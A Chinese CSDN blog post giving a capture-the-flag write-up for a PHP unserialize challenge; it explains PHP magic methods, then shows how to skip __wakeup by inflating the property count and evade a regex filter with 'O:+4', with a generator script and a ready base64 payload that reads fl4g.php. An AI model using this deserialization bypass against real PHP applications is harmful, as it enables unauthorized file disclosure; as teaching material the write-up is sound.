Web_php_unserialize

最新推荐文章于 2023-07-15 20:43:20 发布
最新推荐文章于 2023-07-15 20:43:20 发布
阅读量104 收藏
点赞数
文章标签: php web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ljj20020718/article/details/130992591
版权
文章介绍了PHP中类的特殊方法__construct、__destruct、__wakeup在对象创建、销毁和序列化过程中的作用。讨论了一个利用序列化漏洞绕过__wakeup函数和正则匹配的技巧,展示了如何通过修改序列化字符串来访问受保护的文件。
摘要由CSDN通过智能技术生成

前提知识了解

  1. __construct函数:具有该函数的类会在每次创建对象时先调用此方法,作初始化工作

  2. __destruct函数:会在某个对象的所有引用都被删除或者对象被显示销毁时执行

  3. __sleep函数会在序列化之前被调用

  4. __wakeup函数:unserialize函数会检查是否存在wakeup函数,如果存在,则会先调用__wakeup函数,预先准备对象所需的资源

  5. __wakeup()执行漏洞,一个字符串或对象被序列化后,如果其属性被修改,则不执行__wakeup函数,这是一个绕过点

开始解题

拿到题目看到一段代码

<?php 
class Demo { 
    private $file = 'index.php';
    public function __construct($file) { 
        $this->file = $file; 
    }
    function __destruct() { 
        echo @highlight_file($this->file, true); 
    }
    function __wakeup() { 
        if ($this->file != 'index.php') { 
            //the secret is in the fl4g.php
            $this->file = 'index.php'; 
        } 
    } 
}
if (isset($_GET['var'])) { 
    $var = base64_decode($_GET['var']); 
    if (preg_match('/[oc]:\d+:/i', $var)) { 
        die('stop hacking!'); 
    } else {
        @unserialize($var); 
    } 
} else { 
    highlight_file("index.php"); 
} 
?>
  • 绕过__wakeup:发现__ destruct函数的功能是显示我们传入的文件内容,但__wakeup函数会将file参数指向index.php,所以我们要绕过这个函数(使这个函数不执行),正常序列化结果“O:4:“Demo”:1:{s:10:“Demofile”;s:8:“fl4g.php”;}”,当序列化字符串中表示对象属性个数的值大于真实的属性个数时会跳过__wakeup的执行。为了绕过__wakeup(),我们将1改为任意大于1的都行,如“O:4:“Demo”:2:{s:10:“Demofile”;s:8:“fl4g.php”;}”
  • 绕过正则匹配:preg_match('/[oc]:\d+:/i', $var)表示匹配o或c加冒号加任意数字的形式,为了绕过,我们可以将“O:4:“Demo”:1:{s:10:“Demofile”;s:8:“fl4g.php”;}”中的4改为+4:“O:+4:“Demo”:3:{s:10:“Demofile”;s:8:“fl4g.php”;}”,然后对其进行base64编码 
    <?php 
class Demo { 
    private $file = 'fl4g.php';
}
$x= serialize(new Demo);
$x=str_replace('O:4', 'O:+4',$x);//绕过preg_match()
$x=str_replace(':1:', ':3:',$x);//绕过__wakeup()
echo base64_encode($x);
?>

    得payload为:?var=TzorNDoiRGVtbyI6Mzp7czoxMDoiAERlbW8AZmlsZSI7czo4OiJmbDRnLnBocCI7fQ==

     

JayJay_Lin
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
攻防世界web进阶_Web_php_unserialize
chy082的博客
08-21 693
攻防世界web进阶_Web_php_unserialize 解题思路 打开之后是一段代码审计 <?php class Demo { private $file = 'index.php'; public function __construct($file) { $this->file = $file;//构造函数 把里面的参数变成传进来的参数 } function __destruct() { echo @highlight_file($this->file, true); } func
[web] Web_php_unserialize
lonmar的博客
07-03 849
Web_php_unserialize 源码如下: 知识点: 1、__construct():当对象创建(new)时会自动调用。但在 unserialize() 时是不会自动调用的。(构造函数) 2、__destruct():当对象被销毁时会自动调用。(析构函数) 3、__wakeup():unserialize() 时会自动调用 4. 正则 : /[oc]:\d+:/i \d 是匹配一个数字 +表示一个或多个 i忽略大小写(修饰符) [xyz]字符集合,匹配所包含的任意一个字符(x,y,z
php_igbinary-php5.5版本
07-25
中添加`extension=php_igbinary.dll`(对于Windows系统)或`extension=igbinary.so`(对于Unix/Linux系统),然后重启Web服务器。 总的来说,`igbinary`扩展是提高PHP应用程序性能的一个有效工具,尤其在处理大量...
php_igbinary-1.1.1到2.0.8版本大全
12-29
PHP_igbinary是一款高效的数据序列化扩展,专为PHP设计,用于替代默认的PHP序列化方式(如serializeunserialize)。它的主要目的是提高在数据库存储、缓存系统以及跨进程通信中的性能,尤其是在大型和高负载的Web...
php_igbinary 5.3-7.1版本扩展
04-10
4. **Web服务**: 在API调用中,igbinary序列化的数据可以作为高效的数据传输格式。 ### 四、兼容性与安装 1. **版本兼容**: `php_igbinary`扩展支持PHP 5.3到PHP 7.1,这意味着它能在广泛的老版本和新版本的PHP...
PHP中json_encode、json_decode与serializeunserialize的性能测试分析
10-29
PHP提供了两种主要的方法用于实现这一功能:一是内置的serializeunserialize函数,二是使用JSON格式的json_encode和json_decode函数。本文通过实验比较了这两种方法的性能差异。 首先,我们要了解序列化与反序列...
php_redis.dll和php_igbinary.dll-php5.6版下载
07-25
2. **性能提升**:igbinary序列化/反序列化的速度远超PHP默认的`serialize`/`unserialize`,减少了处理时间,提升了整体性能。 3. **跨语言兼容**:尽管主要是为PHP设计,igbinary格式也可用于其他语言,便于多语言...
Web_php_unserialize,Web_php_unserialize
weixin_35748610的博客
03-16 112
Web_php_unserializeclassDemo{private$file='index.php';publicfunction__construct($file){$this->file=$file;}function__destruct(){echo@highlight_file($this->file,true);}function__wakeup(){if($this-...
WEB:Web_php_unserialize
最新发布
sleepywin的博客
07-15 1162
而正则匹配的规则是: 在不区分大小写的情况下 , 若字符串出现 “o:数字” 或者 "c:数字’ 这样的格式 , 那么就被过滤 .很明显 , 因为 serialize() 的参数为 object ,因此参数类型肯定为对象 " O " , 又因为序列化字符串的格式为 参数格式:参数名长度 , 因此 " O:4 " 这样的字符串肯定无法通过正则匹配。是在反序列化操作中起作用的魔法函数,当unserialize的时候,会检查时候存在__wakeup()函数,如果存在的话,会优先调用__wakeup()函数。
攻防世界——Web——Web_php_unserialize
慎铭的博客
02-22 732
题目源代码如下。 <?php class Demo { private $file = 'index.php'; public function __construct($file) { $this->file = $file; } function __destruct() { echo @highlight_file($this->file, true); } function __wakeup
攻防世界——Web_php_unserialize
Wking
09-03 122
1.代码审计 发现必须构造Demo传入fl4g.php才能得到flag 同时要绕过匹配和反序列化的函数 2.构造绕过 <?php class Demo { private $file = 'index.php'; public function __construct($file) { $this->file = $file; } function __destruct() { echo @highlight.
攻防世界-----Web_php_unserialize
yanbai3的博客
01-04 1139
攻防世界-----Web_php_unserialize 开始刷web题,发现新世界,记录一下 1.序列化(serialize)和反序列化(unserialize) 序列化就是将对象转化为字节序列/字符串,在序列化对象之前,对象的类要实例化/定义过,字符串中包括了类名、对象中所有变量值,但不包括方法。而反序列化后,会将字符串转换回变量,并重建类或对象。 2.正则表达式 正则表达式是匹配模式,要么匹配字符,要么匹配位置。 建议查看https://juejin.cn/post/68449034871557324
攻防世界Web_php_unserialize
qq_51233573的博客
03-10 2470
最近开始刷攻防世界的web题目,遇到一个比较有意思的题目。ctf小白大家勿喷 访问题目链接 是一段php代码 对代码进行初步审计 发现unserialize函数 可以确定是一个php反序列化的利用 由于刚开始学习php的反序列化 对php不是特别熟悉所以对代码进行逐行解析 <?php class Demo { private $file = 'index.php'; //设置了类的私有变量 public function __construc...
攻防世界web_php_unserialize
06-28
攻防世界web_php_unserialize是一个关于PHP反序列化漏洞的题目,需要掌握PHP反序列化漏洞的原理和利用方法。在这个题目中,可能会给出一个序列化的字符串,需要将其反序列化并进行一些操作,最终达到获取flag的目的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值